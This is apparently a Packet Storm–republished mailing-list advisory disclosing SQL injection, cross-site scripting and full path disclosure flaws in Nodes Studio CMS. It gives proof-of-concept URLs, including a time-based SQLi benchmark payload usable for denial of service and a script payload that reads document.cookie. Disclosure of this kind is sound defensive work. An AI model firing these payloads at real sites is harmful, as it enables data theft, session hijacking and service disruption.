Nodes Studio CMS suffers from cross site scripting, path disclosure, and remote SQL injection vulnerabilities.
48c4b8ee1b1536b0509531c834ad18f7f741a4940839a87127f8f0668b6c019aHello list!
There are SQL Injection, Cross-Site Scripting and Full Path Disclosure
vulnerabilities in Nodes Studio CMS. This is Russian commercial CMS, which I
found at one site of Russian terrorists and propagandists.
-------------------------
Affected vendors:
-------------------------
Nodes Studio.
-------------------------
Affected products:
-------------------------
Vulnerable are all versions of Nodes Studio CMS.
----------
Details:
----------
SQL Injection (WASC-19):
http://site/news/%22%20or%20benchmark(10000000,md5(now()))%3E0%23
There are filtration in the system of keywords (such as from) to protect
against SQLi attacks. But it can be bypassed with using special technique or
one can conduct DoS attack via SQLi.
Cross-Site Scripting (WASC-08):
http://site/news/%22%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
Full Path Disclosure (WASC-13):
http://site/news/%22%201
I mentioned about these vulnerabilities at my site
(http://websecurity.com.ua/7694/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed